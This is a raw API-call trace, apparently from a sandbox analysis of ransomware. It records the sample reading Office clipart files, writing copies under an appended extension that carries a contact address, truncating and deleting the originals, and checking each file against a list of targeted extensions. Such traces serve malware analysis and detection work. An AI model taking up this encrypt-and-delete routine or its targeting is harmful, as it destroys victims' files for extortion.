	[0140.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.544] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.544] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0140.545] GetLastError () returned 0x0
	[0140.545] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x504a, lpOverlapped=0x0) returned 1
	[0140.618] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5050, lpOverlapped=0x0) returned 1
	[0140.619] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.619] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.619] SetEndOfFile (hFile=0x384) returned 1
	[0140.619] CloseHandle (hObject=0x384) returned 1
	[0140.619] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.619] SetEndOfFile (hFile=0x31c) returned 1
	[0140.625] CloseHandle (hObject=0x31c) returned 1
	[0140.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.683] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf")) returned 1
	[0140.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.759] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.759] lstrlenW (lpString=".doc") returned 4
	[0140.759] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.759] lstrlenW (lpString=".docx") returned 5
	[0140.759] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.759] lstrlenW (lpString=".pdf") returned 4
	[0140.759] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.759] lstrlenW (lpString=".xls") returned 4
	[0140.759] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.759] lstrlenW (lpString=".xlsx") returned 5
	[0140.760] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.760] lstrlenW (lpString=".ppt") returned 4
	[0140.760] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.760] lstrlenW (lpString=".zip") returned 4
	[0140.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.760] lstrlenW (lpString=".rar") returned 4
	[0140.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString=".bz2") returned 4
	[0140.760] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString=".7z") returned 3
	[0140.760] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.760] lstrlenW (lpString=".dbf") returned 4
	[0140.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.760] lstrlenW (lpString=".1cd") returned 4
	[0140.760] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.760] lstrlenW (lpString=".jpg") returned 4
	[0140.760] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.760] lstrlenW (lpString=".doc") returned 4
	[0140.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString=".docx") returned 5
	[0140.760] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.760] lstrlenW (lpString=".pdf") returned 4
	[0140.760] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.760] lstrlenW (lpString=".xls") returned 4
	[0140.760] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.760] lstrlenW (lpString=".xlsx") returned 5
	[0140.760] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.760] lstrlenW (lpString=".ppt") returned 4
	[0140.761] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.761] lstrlenW (lpString=".zip") returned 4
	[0140.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.761] lstrlenW (lpString=".rar") returned 4
	[0140.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.761] lstrlenW (lpString=".bz2") returned 4
	[0140.761] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.761] lstrlenW (lpString=".7z") returned 3
	[0140.761] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.761] lstrlenW (lpString=".dbf") returned 4
	[0140.761] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.761] lstrlenW (lpString=".1cd") returned 4
	[0140.761] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 63
	[0140.761] lstrlenW (lpString=".jpg") returned 4
	[0140.761] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.761] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.761] lstrlenW (lpString="BD09664_.WMF") returned 12
	[0140.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.762] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7966) returned 1
	[0140.762] CloseHandle (hObject=0x3a0) returned 1
	[0140.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 0x20
	[0140.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.762] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.762] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.900] GetLastError () returned 0x0
	[0140.900] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1f1e, lpOverlapped=0x0) returned 1
	[0140.901] WriteFile (in: hFile=0x3a4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1f20, lpOverlapped=0x0) returned 1
	[0140.902] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.902] WriteFile (in: hFile=0x3a4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.903] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.903] CloseHandle (hObject=0x3a4) returned 1
	[0140.903] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.903] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.905] CloseHandle (hObject=0x3a0) returned 1
	[0140.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.972] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf")) returned 1
	[0140.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.974] lstrlenW (lpString=".doc") returned 4
	[0140.974] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.974] lstrlenW (lpString=".docx") returned 5
	[0140.974] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.974] lstrlenW (lpString=".pdf") returned 4
	[0140.974] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.974] lstrlenW (lpString=".xls") returned 4
	[0140.974] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.974] lstrlenW (lpString=".xlsx") returned 5
	[0140.974] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.974] lstrlenW (lpString=".ppt") returned 4
	[0140.974] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.974] lstrlenW (lpString=".zip") returned 4
	[0140.974] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.974] lstrlenW (lpString=".rar") returned 4
	[0140.974] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.974] lstrlenW (lpString=".bz2") returned 4
	[0140.974] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.974] lstrlenW (lpString=".7z") returned 3
	[0140.975] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.975] lstrlenW (lpString=".dbf") returned 4
	[0140.975] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.975] lstrlenW (lpString=".1cd") returned 4
	[0140.975] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.975] lstrlenW (lpString=".jpg") returned 4
	[0140.975] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.975] lstrlenW (lpString=".doc") returned 4
	[0140.975] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString=".docx") returned 5
	[0140.975] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.975] lstrlenW (lpString=".pdf") returned 4
	[0140.975] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString=".xls") returned 4
	[0140.975] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.975] lstrlenW (lpString=".xlsx") returned 5
	[0140.975] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.975] lstrlenW (lpString=".ppt") returned 4
	[0140.975] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.975] lstrlenW (lpString=".zip") returned 4
	[0140.975] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.975] lstrlenW (lpString=".rar") returned 4
	[0140.975] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString=".bz2") returned 4
	[0140.975] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.975] lstrlenW (lpString=".7z") returned 3
	[0140.975] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.976] lstrlenW (lpString=".dbf") returned 4
	[0140.976] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.976] lstrlenW (lpString=".1cd") returned 4
	[0140.976] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 63
	[0140.976] lstrlenW (lpString=".jpg") returned 4
	[0140.976] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.976] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.976] lstrlenW (lpString="BD19695_.WMF") returned 12
	[0140.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.976] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=12982) returned 1
	[0140.976] CloseHandle (hObject=0x3a4) returned 1
	[0140.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 0x20
	[0140.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.977] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.977] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.977] GetLastError () returned 0x0
	[0140.977] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x32b6, lpOverlapped=0x0) returned 1
	[0140.991] WriteFile (in: hFile=0x3ac, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x32c0, lpOverlapped=0x0) returned 1
	[0140.992] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.992] WriteFile (in: hFile=0x3ac, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.992] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.999] CloseHandle (hObject=0x3ac) returned 1
	[0140.999] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.000] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.054] CloseHandle (hObject=0x3a4) returned 1
	[0141.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 1
	[0141.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.055] lstrlenW (lpString=".doc") returned 4
	[0141.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.055] lstrlenW (lpString=".docx") returned 5
	[0141.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.055] lstrlenW (lpString=".pdf") returned 4
	[0141.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.055] lstrlenW (lpString=".xls") returned 4
	[0141.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.055] lstrlenW (lpString=".xlsx") returned 5
	[0141.055] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.055] lstrlenW (lpString=".ppt") returned 4
	[0141.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.055] lstrlenW (lpString=".zip") returned 4
	[0141.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.055] lstrlenW (lpString=".rar") returned 4
	[0141.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.055] lstrlenW (lpString=".bz2") returned 4
	[0141.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString=".7z") returned 3
	[0141.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.056] lstrlenW (lpString=".dbf") returned 4
	[0141.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.056] lstrlenW (lpString=".1cd") returned 4
	[0141.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.056] lstrlenW (lpString=".jpg") returned 4
	[0141.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.056] lstrlenW (lpString=".doc") returned 4
	[0141.056] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString=".docx") returned 5
	[0141.056] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.056] lstrlenW (lpString=".pdf") returned 4
	[0141.056] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString=".xls") returned 4
	[0141.056] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.056] lstrlenW (lpString=".xlsx") returned 5
	[0141.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.056] lstrlenW (lpString=".ppt") returned 4
	[0141.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.056] lstrlenW (lpString=".zip") returned 4
	[0141.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.056] lstrlenW (lpString=".rar") returned 4
	[0141.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString=".bz2") returned 4
	[0141.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.056] lstrlenW (lpString=".7z") returned 3
	[0141.057] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.057] lstrlenW (lpString=".dbf") returned 4
	[0141.057] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.057] lstrlenW (lpString=".1cd") returned 4
	[0141.057] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63
	[0141.057] lstrlenW (lpString=".jpg") returned 4
	[0141.057] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.057] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.057] lstrlenW (lpString="BD19827_.WMF") returned 12
	[0141.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.057] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=9710) returned 1
	[0141.057] CloseHandle (hObject=0x3a4) returned 1
	[0141.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 0x20
	[0141.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
